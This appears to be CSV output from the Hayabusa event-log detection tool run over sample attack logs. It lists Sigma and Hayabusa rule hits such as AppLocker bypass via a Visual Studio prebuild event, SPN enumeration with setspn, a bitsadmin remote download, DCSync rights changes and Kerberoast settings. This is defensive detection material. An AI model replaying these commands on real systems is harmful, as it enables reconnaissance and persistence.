+2021-01-26 22:21:13.560 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\NuGetScratch\lock\3eaea9d73c9b6f131ef5b5e8a4cf9a7567b32fa3 | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:13.561 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\NuGetScratch\lock\3eaea9d73c9b6f131ef5b5e8a4cf9a7567b32fa3 | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:13.683 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.log | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe"" ""C:\Users\bouss\source\repos\blabla\blabla.sln"" | LID: 0x26f746a2 | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:13.972 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\blabla.lastbuildstate | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:13.975 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:13.975 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:13.978 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | Process: C:\Windows\SysWOW64\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false | LID: 0x26f746a2 | PID: 23168 | PGUID: 00247C92-1749-6010-0000-0010EFAAD92E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: powershell.exe start-process notepad.exe | Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | LID: 0x26f746a2 | PID: 18548 | PGUID: 00247C92-174A-6010-0000-0010C0B2D92E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.296 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\SysWOW64\notepad.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: powershell.exe start-process notepad.exe | LID: 0x26f746a2 | PID: 28276 | PGUID: 00247C92-174A-6010-0000-001042DDD92E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.399 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.command.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.425 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.425 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.425 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.425 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.428 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp"" | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false | LID: 0x26f746a2 | PID: 18188 | PGUID: 00247C92-174A-6010-0000-0010DCFFD92E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.456 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\cl.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp"" | LID: 0x26f746a2 | PID: 11676 | PGUID: 00247C92-174A-6010-0000-0010A20ADA2E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.667 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\VCTIP.EXE"" | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\vctip.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | LID: 0x26f746a2 | PID: 11636 | PGUID: 00247C92-174A-6010-0000-0010FF10DA2E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.871 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.write.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.871 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.write.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.871 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.read.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.872 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.read.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.872 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.command.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:23.229 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Microsoft\VSApplicationInsights\vstelAIF-312cbd79-9dbb-4c48-a7da-3cc2a931cb70\20210126132123_277b7688d03b431eb925a7d64307d79a.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:23.303 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Microsoft\VSApplicationInsights\vstelAIF-312cbd79-9dbb-4c48-a7da-3cc2a931cb70\20210126132123_dd350a9897114eee834fb0993b4dee7e.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:23.305 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Microsoft\VSApplicationInsights\vstelf144292e-e3b2-4011-ac90-20e5c03fbce5\20210126132123_195f3c1acef04eaeb6f67d3ff46e5958.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:33.197 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\Downloads\prebuildevent_visual_studio.evtx | Process: C:\windows\system32\mmc.exe | PID: 22932 | PGUID: 00247C92-EC0A-600F-0000-00100AEFCC2C,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-30 18:13:17.546 +09:00,fs02.offsec.lan,4104,high,CredAccess,Request A Single Ticket via PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
+2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1015,technique_name=Accessibility Features | Cmd: setspn -T offsec -Q */* | Process: C:\Windows\System32\setspn.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x161c887 | PID: 3360 | PGUID: 7CF65FC7-E247-6017-0804-000000001B00 | Hash: SHA1=3B8C77CC25CF382D51B418CB9738BA99C3FDBAA9,MD5=C729DEA1888B1B047F51844BA5BD875F,SHA256=E3B06217D90BD1A2C12852398EA0E85C12E58F0ECBA35465E3DC60AC29AC0DC9,IMPHASH=6CBDE380709080AA31FA97FC18EF504E",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx
+2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,medium,CredAccess,Possible SPN Enumeration,,rules/sigma/process_creation/proc_creation_win_spn_enum.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx
+2021-02-04 00:17:16.085 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13d8 | User: MSSQL01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505.001-SQL Stored Procedures/ID4688-SQL Server started in single mode for psw recovery.evtx
+2021-02-04 00:33:16.107 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sqlcmd -S .\RADAR,2020 | Path: C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\110\Tools\Binn\SQLCMD.EXE | PID: 0x1204 | User: admmig | LID: 0x372a4",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505.001-SQL Stored Procedures/ID4688-sqlcmd tool abuse in SQL Server.evtx
+2021-02-08 21:03:02.776 +09:00,rootdc1.offsec.lan,4738,high,Evas,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-User set with reversible psw encryption.evtx
+2021-02-08 21:06:15.608 +09:00,rootdc1.offsec.lan,4738,high,Evas,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Use only Kerberos DES encryption types.evtx
+2021-02-08 21:06:53.407 +09:00,rootdc1.offsec.lan,4738,high,Evas,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Do not require Kerberos preauthentication.evtx
+2021-02-08 22:01:11.198 +09:00,WIN10-client01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\WINDOWS\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1b1c | User: WIN10-CLIENT01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1564-Hide artifacts/ID4688-Linux Subsystem installation (WSL).evtx
+2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx
+2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx
+2021-02-23 07:35:11.993 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx
+2021-02-23 07:35:20.786 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx
+2021-02-23 07:57:19.435 +09:00,jump01.offsec.lan,2004,medium,,Added Rule in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2004-Any any firewall rule created.evtx
+2021-02-23 08:07:20.794 +09:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: bitsadmin /transfer hackingarticles https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg c:\ignite.png | Path: C:\Windows\System32\bitsadmin.exe | PID: 0x1e00 | User: admmig | LID: 0x92e21,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID4688-BITS transfer initiated.evtx
+2021-02-23 08:07:21.231 +09:00,jump01.offsec.lan,59,info,Evas | Persis,Bits Job Created,Job Title: hackingarticles | URL: https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID3-59-60-BITS job created.evtx
+2021-02-23 08:08:02.534 +09:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1c30 | User: JUMP01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID4688-BITS transfer initiated.evtx
+2021-03-03 19:24:12.402 +09:00,jump01.offsec.lan,7045,info,,New Service Installed,"Name: Microsoft Office Click-to-Run Service | Path: ""C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"" /service | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
+2021-03-03 19:33:48.102 +09:00,jump01.offsec.lan,7045,info,,New Service Installed,"Name: Microsoft Search in Bing | Path: ""C:\Program Files (x86)\Microsoft\Microsoft Search in Bing\MicrosoftSearchInBing.exe"" | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
+2021-03-16 03:49:21.017 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 03:49:23.184 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: ab170ec9.png | URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 03:52:31.347 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eBRSG.img?w=100&h=100&m=6&tilesize=medium&x=1788&y=885&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 03:52:33.804 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 03:53:18.009 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 03:53:51.796 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eC0p1.img?w=100&h=100&m=6&tilesize=medium&x=1964&y=1240&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
